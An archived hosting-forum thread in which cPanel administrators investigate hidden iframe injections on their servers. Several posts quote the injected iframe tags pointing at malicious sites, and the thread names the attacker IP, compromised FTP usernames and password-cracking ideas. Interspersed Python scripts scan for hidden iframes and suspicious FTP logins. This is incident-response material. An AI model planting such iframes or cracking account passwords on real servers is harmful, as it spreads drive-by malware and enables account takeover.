stelaartois.ru - cPanel server hacked?

forlinuxsupport (Well-Known Member, PartnerNOC, joined Dec 22, 2004; cPanel Access Level: Root Administrator)
Hi

I have found this on one of my cPanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all cPanel servers.

I have inserted spaces in the words, in case someone clicks on it :)

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the server down... some type of DoS attack when running it?

Anyone else had this issue? I'm busy investigating it, so I will post back here if I find anything.

Just found out, one server changed the root password and that stopped them getting on. I looked in logs and can't find anyone SSHing on... hmm, puzzling.

Regards
Andy
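A quick way to find out which sites on a server carry this kind of injection is to scan the document roots for iframes that are sized to a few pixels or styled display:none, the two tricks the snippets in this thread use. This is an added example, not code from the thread; the sample web root, file names and example.invalid URLs are constructed so it runs offline, and the hidden-size threshold (width or height of 0 to 5) is an assumption.

```python
import re
import tempfile
from pathlib import Path

# "Hidden" = width/height of 0-5 px (assumed threshold) or style display:none.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*['"]?[0-5]['"]?(?!\d)|display\s*:\s*none""",
    re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)

def find_hidden_iframes(text):
    """Return the src of every iframe in text that is sized or styled to be invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if HIDDEN_RE.search(tag):
            src = SRC_RE.search(tag)
            hits.append(src.group(1) if src else "(no src)")
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Walk a document root; map each file containing hidden iframes to their srcs."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_sample_tree():
    """Constructed sample web root: one injected index.php, one clean page."""
    root = Path(tempfile.mkdtemp())
    pages = {
        "site1/index.php": "<body>Welcome<IFRAME name='StatPage' "
            "src='http://example.invalid/index2.php' width=5 height=5 "
            "style='display:none'></IFRAME></body>\n",
        "site2/index.html": "<body><iframe src='https://example.invalid/embed' "
            "width=560 height=315></iframe></body>\n",
    }
    for name, body in pages.items():
        (root / name).parent.mkdir(parents=True, exist_ok=True)
        (root / name).write_text(body)
    return root

if __name__ == "__main__":
    for file, srcs in scan_tree(build_sample_tree()).items():
        print(file, "->", ", ".join(srcs))
```

On a real box, point scan_tree() at each account's public_html and compare the reported src values against the ones in this thread.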
 

Kelmas (Well-Known Member, joined Nov 6, 2006, Lithuania)
That is an exploit that hit many HostGator servers some time ago, and that iframe contained a serious virus. I suggest backing up the /home/ dirs and reinstalling the servers.

The problem is in PHP rendering (it automatically adds the iframe to all generated pages) and it spreads due to an IE exploit. Other browsers do not show this.
 

forlinuxsupport (Well-Known Member, PartnerNOC, joined Dec 22, 2004; cPanel Access Level: Root Administrator)
Hey guys

I know the exploit you are talking about, and I ran the cPanel script and did the force update when that happened (about a month or so ago).

So I'm puzzled as to how they are able to do it now...

I'm hoping it's not a new cPanel exploit. Apache logs have rotated (nice one, cPanel) so I can't even look back in those.

Regards
Andy
 

AndyReed (Well-Known Member, PartnerNOC, joined May 29, 2004, Minneapolis, MN)
forlinuxsupport said:
I have found this on one of my cPanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all cPanel servers.

I have inserted spaces in the words, in case someone clicks on it :)

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the server down... some type of DoS attack when running it?

Anyone else had this issue? I'm busy investigating it, so I will post back here if I find anything.

Just found out, one server changed the root password and that stopped them getting on. I looked in logs and can't find anyone SSHing on... hmm, puzzling.

Just in case, these are a few of the symptoms of a server that has been compromised:

  1. Applications that suddenly don't respond as expected.
  2. Additional user accounts that you can't account for (these may be made to look like system accounts)
  3. New files or directories with unusual names.
  4. Additional network traffic that can't be traced to a particular process
  5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
  6. Server running significantly slower

If you are experiencing any of these symptoms, your server has been compromised and the best solution is an OS reload.
 

JamesSmith (Well-Known Member, joined Sep 17, 2003, UK, Luton)
Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

Code:
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>

I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
 

AndyReed (Well-Known Member, PartnerNOC, joined May 29, 2004, Minneapolis, MN)
JamesSmith said:
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!

Unless you can prove that your server was hacked because of their control panel, you don't have a case against them. It is in your best interest to take all measures to harden and secure your server. Remember that cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, cPanel is the most secure and robust control panel.
 

Kelmas (Well-Known Member, joined Nov 6, 2006, Lithuania)
JamesSmith said:
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!

You can try to search for information at the HostGator forums; the guys had a hard time, but solved a similar attack.
 

JamesSmith (Well-Known Member, joined Sep 17, 2003, UK, Luton)
AndyReed said:
Unless you can prove that your server was hacked because of their control panel, you don't have a case against them. It is in your best interest to take all measures to harden and secure your server. Remember that cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, cPanel is the most secure and robust control panel.

I have no doubt that it was because of the recent cPanel exploit, as it's occurred and is occurring on a number of other hosts.

It will be interesting to see how this progresses and if the impact of it is felt further; maybe when more people are affected someone will take notice.
 
dfltech (Guest)
I was googling and found some links that had this problem as well.

Now what concerned me was they all used cPanel servers and they were all affected in late November. So it is definitely not the last exploit.

I hope that it is not cPanel again!!!
 

JamesSmith (Well-Known Member, joined Sep 17, 2003, UK, Luton)
The isecurepages code started to appear for us about a week before the cPanel exploit was announced by cPanel.

I think we need some clarification from HostGator on whether their problem was the same, and the line of code that was added to people's sites. If we can see a pattern, then there’s still a problem that cPanel needs to do something about.

The problem is, we don't know how this line of code is being added to sites.
 

forlinuxsupport (Well-Known Member, PartnerNOC, joined Dec 22, 2004; cPanel Access Level: Root Administrator)
Yes... got it :)

They had guessed 3 users' FTP usernames and passwords on the server.

Not sure how they would get those usernames.

The IP he came from was 209.160.65.6

The usernames were... so not easy to guess:
lookwhat
paulslee
yeschef

I'm wondering if there is more to this... and how they got those details...

Might have exploited the server earlier and downloaded all usernames and passwords...

Cheers
Andy
 
dfltech (Guest)
Actually late September.
No, it's late November... and by the way I have a friend whose site had the same iframe hack yesterday. Now he has a VPS with very few sites and cPanel, but all other sites were intact. So this should not have anything to do with cPanel, I suppose.

Maybe a PHP application or a function...

And regarding HostGator, their issues were at the same time when cPanel had an exploit. I have gone through their forums but did not find any recent complaints about the iframe hack.
 

Kelmas (Well-Known Member, joined Nov 6, 2006, Lithuania)
I have an account at HostGator and clearly know that the iframe issue was IN SEPTEMBER.

Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say that very few use secure FTP.
 

JamesSmith (Well-Known Member, joined Sep 17, 2003, UK, Luton)
I don’t think the passwords are being captured by anyone listening on the server or between the server and user, or even on the user's system. It’s more likely they gained the passwd file off the server and ran something like jack the ripper to crack the passwords.

We've seen the same IP on all of our affected servers connect to the server with many different usernames and log in successfully. We're currently investigating if it’s feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
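The pattern JamesSmith describes, one source IP successfully authenticating as many different accounts, is easy to pull out of the FTP server's log. This is an added example, not code from the thread; it assumes pure-ftpd-style syslog lines (the FTP server cPanel shipped at the time; the exact format is an assumption), uses constructed sample lines with documentation-range IPs and the account names from this thread, and flags a source that logs in as 3 or more distinct users or accumulates 10 or more failed attempts (both thresholds are assumptions).

```python
import re
from collections import defaultdict

# Assumed pure-ftpd syslog format: "(?@IP) [INFO] user is now logged in" and
# "(?@IP) [WARNING] Authentication failed for user [name]". Sample is constructed.
LOGIN_OK = re.compile(
    r"\(\?@(?P<ip>[\d.]+)\) \[INFO\] (?P<user>\S+) is now logged in")
LOGIN_FAIL = re.compile(
    r"\(\?@(?P<ip>[\d.]+)\) \[WARNING\] Authentication failed for user \[(?P<user>[^\]]+)\]")

SAMPLE_LOG = """\
Dec  2 03:14:01 srv pure-ftpd: (?@203.0.113.7) [WARNING] Authentication failed for user [lookwhat]
Dec  2 03:14:09 srv pure-ftpd: (?@203.0.113.7) [INFO] lookwhat is now logged in
Dec  2 03:15:22 srv pure-ftpd: (?@203.0.113.7) [INFO] paulslee is now logged in
Dec  2 03:16:40 srv pure-ftpd: (?@203.0.113.7) [WARNING] Authentication failed for user [yeschef]
Dec  2 03:16:47 srv pure-ftpd: (?@203.0.113.7) [INFO] yeschef is now logged in
Dec  2 09:02:13 srv pure-ftpd: (?@198.51.100.20) [INFO] lookwhat is now logged in
"""

def summarize(lines):
    """Per source IP: the set of users it logged in as, and its failed-auth count."""
    ok, fail = defaultdict(set), defaultdict(int)
    for line in lines:
        m = LOGIN_OK.search(line)
        if m:
            ok[m["ip"]].add(m["user"])
            continue
        m = LOGIN_FAIL.search(line)
        if m:
            fail[m["ip"]] += 1
    return ok, fail

def suspicious_sources(lines, min_users=3, min_failures=10):
    """Flag IPs that authenticated as many distinct accounts, or hammered the login."""
    ok, fail = summarize(lines)
    flagged = {}
    for ip in set(ok) | set(fail):
        users = sorted(ok.get(ip, ()))
        if len(users) >= min_users or fail.get(ip, 0) >= min_failures:
            flagged[ip] = {"users": users, "failures": fail.get(ip, 0)}
    return flagged

if __name__ == "__main__":
    for ip, info in suspicious_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: logged in as {len(info['users'])} accounts {info['users']}, "
              f"{info['failures']} failed attempts")
```

Feed it the real log (typically /var/log/messages on such a box) and the flagged IPs tell you which accounts to reset and which source to block at the firewall.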
 

chirpy (Well-Known Member, Verified Vendor, joined Jun 15, 2002; location: Go on, have a guess)
On most modern Linux distros passwords are not stored in /etc/passwd, they're in /etc/shadow, and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak passwords.

Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a separate server that has been root compromised. It's unlikely, but possible.
 

JamesSmith (Well-Known Member, joined Sep 17, 2003, UK, Luton)
On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.

So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames... or someone has been able to gain other sensitive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem or something else gathered information before cPanel patched it.
 

carluk (Well-Known Member, joined Sep 2, 2003)
Get John the Ripper to test your users' passwords.
 